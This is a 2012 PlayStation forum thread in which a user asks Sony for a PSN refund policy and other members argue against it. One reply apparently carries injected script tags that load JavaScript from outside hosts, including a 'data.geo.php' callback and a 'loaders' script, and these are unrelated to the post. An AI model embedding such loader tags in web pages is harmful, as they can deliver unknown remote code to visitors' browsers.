Sep 22 2012
By: Smooth4Lyfe Wastelander 657 posts

PSN Needs a Refund Policy!!!!

68 replies 1213 views Edited Sep 22, 2012

Seriously!! Sony please consider this! It isnt fair that games/things from the PSN store are bought and cannot be refunded, when you can even return games you buy from the store but not online?! There are many reasons one should be able to refund a game.

I bought "The Heist" thinking in had local multiplayer only to find out it was only online, and the description is very mileading and I think not detailed enough.

I have also seen a lot of people get things which arent what they expected or wanted it.

SOLUTION:

HAVE A REFUND POLICY!!

ex. Time limit before games cannot be refunded (Games cannot be refunded 1hr after purchase), Try before you buy

Who agrees? I think its only fair for everyone

Message 1 of 69 (1,213 Views)
MVP Support
40513 posts

Re: PSN Needs a Refund Policy!!!!

Sep 22, 2012

Smooth4Lyfe wrote:

Seriously!! Sony please consider this! It isnt fair that games/things from the PSN store are bought and cannot be refunded, when you can even return games you buy from the store but not online?! There are many reasons one should be able to refund a game.

I bought "The Heist" thinking in had local multiplayer only to find out it was only online, and the description is very mileading and I think not detailed enough.

I have also seen a lot of people get things which arent what they expected or wanted it.

SOLUTION:

HAVE A REFUND POLICY!!

ex. Time limit before games cannot be refunded (Games cannot be refunded 1hr after purchase), Try before you buy

I disagree.

Personally I think it's pretty clear that the game you're referring to does not have the feature you wanted, I haven't looked myself, but even if as you said it is not very clear on the PSN Store it would be very easy to Google your question, something that if this feature was that important to you, you should probably have done.

Sony's general policy is that no refunds are given, having said that Sony does give refunds for some purchases under differing circumstances, if there is an error with the download, the download is corrupt etc, also occasionally if you get a sympathetic customer service representative on the other end of the phone they will consider a refund for other reasons too.

CMNTY_SIG_MVP_500x100_002B.jpg

Customer Service - 1-800-345-SONY (7669)
Account & billing Support -1-877-971-SONY (7669)
Available Mon to Fri 8am - 8pm PST
Message 2 of 69 (1,200 Views)
PIayStation MVP
12905 posts

Sep 22, 2012

Smooth4Lyfe wrote:

SOLUTION:

HAVE A REFUND POLICY!!

I don't really feel a lot of sympathy for you, because you purchased something without doing enough research. If it were me, I would want to find out as much about the game as possible, such as reading reviews, watching gameplay videos, and if available download and play a demo.

I found this review in less than 30 seconds:

http://www.ign.com/articles/2011/10/19/payday-the-heist-review

Also your store analogy isn't valid, you can't return games to most stores once you opened and played them, only if they still have shrink wrap intact. If stores didn't have that policy, then some people would abuse it...

Message 3 of 69 (1,196 Views)
Wastelander
657 posts

Sep 22, 2012
Well I mean its true I could have done more research true, but it still should have been in the description though. Even in general I don't think its fair that you have to be forced to keep what you buy....even if I was to refund it for half price, I wouldnt mind

For Example...say I bought Spiderman 2 from the PSN store, and it was not all I expected it to be....do I really have to be forced to keep it??

If I had bought it from the store, I could easily return it no matter what store it is, but PSN forces me to lose $60...I mean think about it...its really not fair...dont get me wrong I LOVE PSN for all its worth, but I just dont think this is fair. I think atleast half price refund should be possible
Message 4 of 69 (1,185 Views)
0 Likes
Ghost of Sparta
11942 posts

Sep 22, 2012
Like what was said above: the vast majority of retailer WILL NOT accept opened games, movies, and books for return. So you're still out $60 for making a dumb decision.
Message 5 of 69 (1,178 Views)
0 Likes
Wastelander
766 posts

Sep 22, 2012

you dont necesarily have to keep what you bought

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 6 of 69 (1,173 Views)
0 Likes
Uncharted Territory
1283 posts

Sep 22, 2012
That is why Playstation Plus subscribers get to try a good number of titles for 60 minutes before making a purchase.
Message 7 of 69 (1,167 Views)
0 Likes
Wastelander
657 posts

Sep 22, 2012

johngie wrote:
Like what was said above: the vast majority of retailer WILL NOT accept opened games, movies, and books for return. So you're still out $60 for making a dumb decision.

Idk what stores you shop at, but ALL stores I have returned games opened and played, even though I didn't get a full refund I still got a refund

Message 8 of 69 (1,153 Views)
0 Likes
Wastelander
657 posts

Sep 22, 2012

FidelityNy wrote:
That is why Playstation Plus subscribers get to try a good number of titles for 60 minutes before making a purchase.

Yeah I am a PS+ Subscriber and its worth it...but it still would be fair for a refund policy...what if someone bought a game on accident?? They are forced to keep it?

Message 9 of 69 (1,169 Views)
0 Likes
PIayStation MVP
12905 posts

Sep 22, 2012

Smooth4Lyfe wrote:
Well I mean its true I could have done more research true, but it still should have been in the description though. Even in general I don't think its fair that you have to be forced to keep what you buy....even if I was to refund it for half price, I wouldnt mind

For Example...say I bought Spiderman 2 from the PSN store, and it was not all I expected it to be....do I really have to be forced to keep it??

If I had bought it from the store, I could easily return it no matter what store it is, but PSN forces me to lose $60...I mean think about it...its really not fair...dont get me wrong I LOVE PSN for all its worth, but I just dont think this is fair. I think atleast half price refund should be possible

What stores allow you to return games that you have opened it. Not Walmart, not Target, not Best Buy, not Toys R Us, not GameStop. The only place I can think of is Costco, but their game selection is quite limited.

No digital store that I know of offers refunds if you are unsatisfied with the product, but usually that isn't much of an issue because digital purchases are usually quite cheap to begin with.

One other thing, there was a free demo of Heist you could have downloaded and played prior to making a purchase decision. So you could have actually tried it out before you bought it.

So again you are really out of excuses. Make this be a lesson for you, and next time take some time to do research before your make your purchases.

Message 10 of 69 (937 Views)